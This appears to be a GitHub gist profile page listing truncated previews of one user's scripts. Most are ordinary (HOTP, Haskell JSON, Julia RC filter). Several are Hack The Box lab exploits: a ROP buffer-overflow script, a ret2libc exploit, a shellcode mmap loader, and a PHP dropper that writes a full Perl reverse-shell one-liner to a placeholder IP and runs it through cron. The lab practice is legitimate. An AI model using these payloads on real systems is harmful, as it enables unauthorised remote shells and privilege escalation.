Saf safiire

View GitHub Profile
@safiire
safiire / hotp.rb
Last active Apr 1, 2019
A script to calculate an HOTP code
#!/usr/bin/env ruby
require 'base32'
require 'openssl'
# Script to calculate HOTP so I don't have to use my phone
class HOTP
def initialize(original_secret, counter = 0)
secret = Base32.decode(original_secret)
@safiire
safiire / netstat.rb
Created Feb 25, 2019
Grab Netstat from "hackback" box on HTB
#!/usr/bin/env ruby
require 'uri'
require 'net/http'
require 'json'
Url = 'http://hackback:6666/netstat'
puts "Grabbing #{Url}"
uri = URI.parse(Url)
@safiire
safiire / exploit.sh
Created Jan 9, 2019
Buffer overflow from a small amount of space, with some ROP and env shellcode
#!/bin/bash
# ASLR is on (stack, libs, vdso, etc)
# execstack is on
# .text segment is static, no pie
#
# #include <string.h>
#
# int dobug(char *arg) {
# char buf[8];
# strcpy(buf, arg);
@safiire
safiire / cron_executed_reverse_tcp.php
Created Sep 26, 2018
So your shell won't inherit php's file descriptor situation.
<?php
$perl = 'use Socket;$i="xx.xx.xx.xx";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
$fp = fopen('/tmp/shell.pl', 'w');
fwrite($fp, "#!/usr/bin/perl\n");
fwrite($fp, $perl);
fclose($fp);
system('chmod 777 /tmp/shell.pl');
$hour = date('H');
$minute = date('i') + 1; // disgusting
$fp = fopen('/tmp/add_cron.sh', 'w');
@safiire
safiire / october_aslr_setuid.rb
Last active Nov 8, 2018
Return2LibC for a HTB setuid binary
#!/usr/bin/env ruby
# This is what we need to guess from ldd vuln
ldd_load_address = 0xb75ba000
# Next get offset of system() and its address
system_offset = 0x1e310
system_address = ldd_load_address + system_offset
# Next get offset of /bin/sh from strings -d -tx libc.so.6, minus correction
@safiire
safiire / mmap.c
Last active Aug 28, 2017
Copy Shellcode into a Write Exec mmap()'d area, and jump to it.
#include <string.h>
#include <sys/mman.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
// NOP padded execve("/bin/sh")
char *sc =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
@safiire
safiire / fork_aslr.c
Last active Aug 25, 2017
How many bits are random on Linux ASLR?
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
/*
* A fork() doesn't (and shouldn't) re-randomize the address space
* but that happens properly after the exec()
@safiire
safiire / parse_json.hs
Created Jan 17, 2017
Parsing JSON in Haskell
{-# LANGUAGE OverloadedStrings, DeriveGeneric #-}
import Data.Text (Text)
import Data.Aeson
import GHC.Generics
import qualified Data.ByteString.Lazy as B
data Person =
Person { first :: !Text
, last :: !Text
@safiire
safiire / rc_filter_simulation.jl
Last active Jul 19, 2017
Same old RC Filter Simulation in Julia
# Modern Julia (1.x) syntax for the abstract type and its concrete subtypes
abstract type PassiveComponent end
struct Resistor <: PassiveComponent
value::Complex{Float64}
end
struct Capacitor <: PassiveComponent
value::Complex{Float64}
end
@safiire
safiire / kleisli.rb
Created Dec 16, 2016
Kleisli Gem is pretty awesome
require 'kleisli'
def do_lots(count)
(0..count).reduce(0){|sum, value| sum + value }
end
future = Future(100000000) >-> value {
Future {
do_lots(value.call)
} >-> big_sum {